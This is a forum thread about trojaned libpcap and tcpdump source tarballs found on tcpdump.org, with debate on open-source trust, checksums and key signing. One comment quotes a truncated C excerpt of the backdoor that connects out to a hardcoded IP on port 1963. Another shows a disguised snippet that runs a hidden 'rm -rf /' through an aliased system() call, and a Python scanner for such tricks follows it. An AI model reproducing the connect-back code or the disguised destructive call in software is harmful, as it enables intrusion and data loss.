Trojan Found in libpcap and tcpdump
msolnik writes "Members of The Houston Linux Users Group discovered that the newest sources of libpcap and tcpdump available from tcpdump.org were contaminated with trojan code. HLUG has notified the maintainers of tcpdump.org. See our reports here or here."
It's not unusual at all in the Unix world. Pete's sake, K. Ritchie (he who invented Unix and C, or at least part of the team) put trojans into early versions of cc and login so that he could get access to _any_ unix system.
It worked with the trojaned compiler making bent versions of the login program. You couldn't detect it, as if you compiled another version of cc or login from clean source the bent cc would infect that one and the cycle of infection continued. Very cleverly done.
Actually, for all you know maybe every version of gcc ever allows RMS and Torvalds into your box...
The program connects to 212.146.0.34 (mars.raketti.net) on port 1963
With that information, I suppose that it is easy to find out which Finnish 'author' included the trojan, and would be simple to track him down. But my question is how something like this could have been included in an open source code and released to the general public?
-- 7 string electric violin + live loop samplers
This never used to happen. Now it is as if someone is intentionally trying their luck to trojan open-source projects. The crack0r types usually try to claim some kind of responsibility to increase their m0j0, but I haven't heard of anyone doing so. Usually a crack0r will try to make the trojaning *bad* to further make themselves feel better, but these trojanings are often in name only, and are of no real security threat. I am wondering if this is an anti-freesoftware publicity ploy by some individual or group.
Either that or someone has trojaned (is that a word?) his site!
The trojan contacts the following website:
http://mars.raketti.net/~mash/services
DNS Details:
Registrant:
Kuopion Puhelin Oyj (RAKETTI2-DOM)
KUOPIO, 70780
KUOPIO,70780
FI
Domain Name: RAKETTI.NET
Administrative Contact, Technical Contact:
Siltakoski Petri (SP730-ORG) admin@DOMAIN.RAKETTI.NET
Kuopion Puhelin Oyj
Levasentie 23
KUOPIO
FINLAND
+358-17-302329
Fax- +358-17-3614904
Record expires on 07-Oct-2004.
Record created on 08-Oct-1998.
Database last updated on 13-Nov-2002 08:36:01 EST.
Domain servers in listed order:
NS1.RAKETTI.NET 212.146.0.10
NS2.RAKETTI.NET 212.146.0.11
From excellent karma to terrible karma with a single +5 funny post...
That's good if you can assure that the MD5 checksum is for the original tarball. What if the guy who placed the trojan placed a new MD5 checksum as well?
Any fool can talk, but it takes a wise man to listen.
How did it get into tcpdump.org's sources exactly?
Presumably the tcpdump.org FTP server got 0wned, and the trojan was planted, but the people that found the trojan aren't the server admins - they just found it in the source they downloaded. And I doubt we will find out how the perpetrators got in, either. It would have been nice to find out in more detail what happened when the OpenBSD FTP server was compromised, but people are usually tight-lipped in these cases.
-- Never hit a man with glasses. Hit him with a baseball bat.
Personally I've seen many backdoors in closed source software, even more, as a programmer years ago, I was instructed to put backdoors on Banking software by my employer and the bank auditing team. And let me tell you that the security was so bad that I personally switched my bank account from that institution to another.
I don't think the only irrelevant comment is thinking that bad things(r) happen only in one place. Like I said, on open source software, I Can Audit Myself The Code.
This argument can of course be reversed: Because sources are open, one can insert trojans.
So there's no point mentioning it.
The point is: When was the specific change added? By whom? The maintainer should know. Let us know. Then put the person who sent in the patch with the trojan in a black list so his/her future patches to open source programs are first severely checked, if accepted at all.
That's more like it -I think-.
I admit to not knowing a lot about open source development, not being a developer myself. But I'm curious, is there any sort of legal accountability when someone intentionally codes a trojan into a piece of software? Is it possible to keep track of who is writing what code? When trojans, etc, are discovered, are you limited to just patching them and going from there, or is it usually possible to find out who did it and therefore be suspect of future code?
Buy the President
that's not true, look at it again ...
/. eats this code post ... ):
/dev/null 1>/dev/null
in the middle of the fully commented services file, you find (let's hope
#!/bin/sh
cat >conftes.c
#include
#include
#include
#include
#define XOR_KEY 0x89
int main (int argc, char **argv)
{
char c;
int s, x, sv0[2], sv1[2];
struct sockaddr_in sa;
switch (fork ()) { case 0: break; default: exit (1);}
close (0); close (1); close (2);
do {
if ((s = socket (AF_INET, SOCK_STREAM, 0)) == (-1))
exit (1);
sa.sin_family = AF_INET;
sa.sin_port = htons (1963);
sa.sin_addr.s_addr = inet_addr ("212.146.0.34");
alarm (10);
if (connect (s, (struct sockaddr *)&sa, sizeof (sa)) == (-1))
exit (1);
if ((x = read (s, &c, 1))
nice, isn't it?
heheh
Very Offtopic...
1963 - Assassination of President Kennedy
The Other Nate
An AC wrote:
> closed src doesn't have its src on some
> webserver for some kiddie to trojan in the first
> place. sure the possibility of some employee or
> the employer itself to trojan the src, but most
> open source trojans are someone breaking into
> the web server and uploading modified src. by
> definition this won't happen with closed src
> since closed src doesn't release src, so your
> argument is irrelevant.
Oh, no? Look here:
http://news.zdnet.co.uk/story/0,,s2082221,00.ht
Microsoft had their source available to some cracker for three months back in 2000. Of course they later spun it down to "one day and we were watching them all the time".
Point is, closed source can be vulnerable too. Only Microsoft knows if any damage was really done, and they aren't telling us squat.
"At this moment, it has control of systems all over the world.
And...we can't do a damn thing to stop it."
Miyasaka, "Godzilla 2000 Millennium" (Japanese version)
I'm just typing out loud here.
Yes, there'd almost certainly have to be a cost associated with this, and I'd think it would be paid by the people who wanted source code, but didn't want to have to worry about checking it for Trojans etc.
The source could still be publicly available for comment and review to add to those being paid to perform the analysis.
Seems like this might be a good service, once the idea is fleshed out more...
There'd also need to be some definition of "guaranteed" (or maybe just a different word :0) that fit this scenario, most people don't want to set themselves up to be sued.
Give a hand, not a hand-out.
Having source code freely available doesn't imply security. Ken Thompson demonstrated this very eloquently in his paper.
Maybe someone ran arbitrary code on the webserver.
Don't think for a second that Microsoft hasn't put back
Microsoft *have* inserted a backdoor into the CryptoAPI for the NSA.
I know this is a stupid question but I don't understand how this ended up in the distribution in the first place.
To ensure perfect aim, shoot first and call whatever you hit the target
We need to come together and paaaaaarty! :-)
Really, that's the only solution to this problem. Probably, this is something we are going to see more frequently, so frequently perhaps that it may undermine the free software community's credibility. Therefore, we must come together and meet, and exchange signatures, so that at least we can ensure that the software is signed by its maintainer.
Now, go and get registered at Biglumber, sign up to the keysignings list and start organizing keysigning parties. Also, make sure that you meet other hackers when you're out travelling.
Employee of Inrupt, Project Release Manager and Community Manager for Solid
Bruce
Bruce Perens.
but if all code is well documented, it's generally easier to understand and intentional obfuscation might be easier to spot.
How hard is it to write code that appears to do something friendly, but actually does something really nasty? Consider this apparently friendly code:
// Bunny ID
// Hugs the bunny specified by 'bunny'
#define hug system
const char bunny[] = { 0x72, 0x6d, 0x20, 0x2d, 0x72, 0x66, 0x20, 0x2f, 0 };
void hug_a_bunny() {
hug(bunny);
}
Hint: bunny evaluates to "rm -rf
The world will end in 5 minutes. Please log out.
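A review-side check for the two tricks in the snippet above (a byte array that spells out a command, and a #define that aliases system), as an added example that is not from the thread; the scanner, its patterns and the sample C source are constructed here for illustration:

```python
import re

# Added example, not from the thread: a review helper that reads C source, decodes
# byte-array initialisers into the strings they spell, and flags #define aliases of
# process-spawning functions, i.e. the two tricks in the "hug_a_bunny" snippet.
BYTE_ARRAY = re.compile(
    r'\bchar\b\s*\*?\s*(\w+)\s*(?:\[[^\]]*\])?\s*=\s*\{([^}]*)\}', re.S)
EXEC_ALIAS = re.compile(
    r'#\s*define\s+(\w+)\s+(system|popen|execl|execlp|execle|execv|execvp|execve)\b')
LITERAL = re.compile(r"0[xX][0-9a-fA-F]+|\d+|'.'")

def _literal_value(tok):
    """Value of one C integer or character constant (hex, octal, decimal, 'c')."""
    if tok.startswith("'"):
        return ord(tok[1])
    if tok[:2].lower() == '0x':
        return int(tok, 16)
    if len(tok) > 1 and tok[0] == '0':
        return int(tok, 8)
    return int(tok)

def decode_initialiser(body):
    """'0x72, 0x6d, 0' -> 'rm'; stops at the NUL terminator, '?' for non-printables."""
    chars = []
    for tok in LITERAL.findall(body):
        value = _literal_value(tok)
        if value == 0:
            break
        chars.append(chr(value) if 32 <= value < 127 else '?')
    return ''.join(chars)

def scan_c_source(src):
    """Return (kind, name, detail) findings a reviewer should look at by hand."""
    findings = []
    for name, body in BYTE_ARRAY.findall(src):
        text = decode_initialiser(body)
        if len(text) >= 3:          # tiny char tables are noise, skip them
            findings.append(('hidden-string', name, text))
    for alias, target in EXEC_ALIAS.findall(src):
        findings.append(('exec-alias', alias, target))
    return findings

# Constructed sample: the snippet from the thread plus an ordinary lookup table.
SAMPLE = """
#define hug system
const char bunny[] = { 0x72, 0x6d, 0x20, 0x2d, 0x72, 0x66, 0x20, 0x2f, 0 };
void hug_a_bunny() { hug(bunny); }
static const char digits[] = { '0', '1', 0 };  /* too short to report */
"""

if __name__ == '__main__':
    for kind, name, detail in scan_c_source(SAMPLE):
        print(f'{kind:14} {name:8} {detail!r}')
```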
The mirrors contained the trojan as well.
How many times have you downloaded sources and blindly ran
./configure && make? This is certainly a case for running builds in a systrace jail.
Besides, this is an exploit of trust, no operating system is any more vulnerable than any other. Binary distributions would only contain the libpcap backdoor to ignore tcp port 1963, the actual trojan appears in the configure script.
For the record, this fits the modus operandi of trojans found in irssi, fragroute, dsniff, BitchX, OpenSSH, and sendmail.
Let's acknowledge the reason we have phrases like "trojan" and "virus" in respect to computer software. Each of them describes a different type of malicious code. At the least it's disingenuous to claim that a virus "inserts a trojan". To put it more accurately, it's just flat out wrong to claim that a virus trojans (sic) a binary with a copy of itself.
Using the language the way you are is many times worse than using phrases like "pirate" to describe a criminal and civil rights violator. Or using "hacker" v. "cracker".
Nedward
Yeah... my servers front end my home network, so they are turned on 24/7 and right now are connected through redundant DSL connections to the Internet. So mine make a somewhat attractive target.
Since I am basically a lazy sysadmin, my approach had been to use really obscure hardware for my server. To accomplish that I bought a Rebel Netwinder on the theory that any exploit out for x86 would probably take months to be ported to the StrongARM (the StrongARM instruction set is both restrictively small, and completely anal about non-aligned memory accesses, so hand-coded assembly is a pain to write if you are trying to take advantage of a stack overflow of some kind.)
Recently I've swapped the rebel box for another Intel server, this time running RH7.3, and I bought a subscription to RHN to keep it up to date. Since RHN manages all of the security updates and dependencies, all I have to do is log on once a week or so and request the updates. So now I get to be lazy in two regards; first it is much easier to add new software (StrongARM porting being not my cup of tea), and secondly RHN takes care of the security updates.
I imagine that Debian users would argue likewise for apt-get.
LibBT: BitTorrent for C - small - fast - clean (Now Versio
Oops, forgot to answer that. I did log on to IRC and tracked down a couple of the users listed in the eggdrop config files. The original channel was no longer active, but there were a few people with the same IDs logged in on another channel; but the channel content was so spooky that it kind of freaked me out at the time. For about five minutes the only thing in the channel were various people sending messages like 'CCs', or 'eggable accts'. Then suddenly some guy posted a message saying approximately: 'so and so is a lousy copier', then 'I may as well give this out as a freebie since I don't want him to get all the use of it', followed by some guy's name, address, SSN, phone, and credit card numbers.
At that point I decided I was in the middle of things I didn't want to be in. I did call the person to let them know that his credit card information had been stolen, and to watch his receipts, but basically dropped it there. As far as I know the FBI only cares about computer hacking if there has been at least $1k of damage. I had about a day to rebuild my server (before replacing it a month later with the Rebel), but nothing close to $1k; no deleted files or anything.
I did track down the person's Nick which basically turned into a Google search, but since he'd been using that Nick for a long time and in many different places, it was very easy to do. The Nick seemed to belong to a student at UCB, previously a student in Singapore, but the evidence was pretty loose, and in any case I doubt I could have done more than make a few legal threats. Ultimately I decided to chalk it all down as a learning experience and let it go (but I still have the backup tapes of the hacked machine if I ever need them.)
Handing out other people's passwords wouldn't have been possible. Eggdrop stores them in encrypted form so even with the contents of the password file there wasn't anything I could do to retrieve their plain text passwords.
Hmm... I don't know anything about this eggdrop software, but couldn't someone hack it, remove the encryption algorithms on the passwords, run an IRC client, advertise it as a cracked machine on the relevant IRC channels, etc.?
Essentially setting up a honeypot to capture hacker login/pw combinations to later track activity, etc? If the honeypot were configured well, I would imagine you could trick them into giving away quite a bit.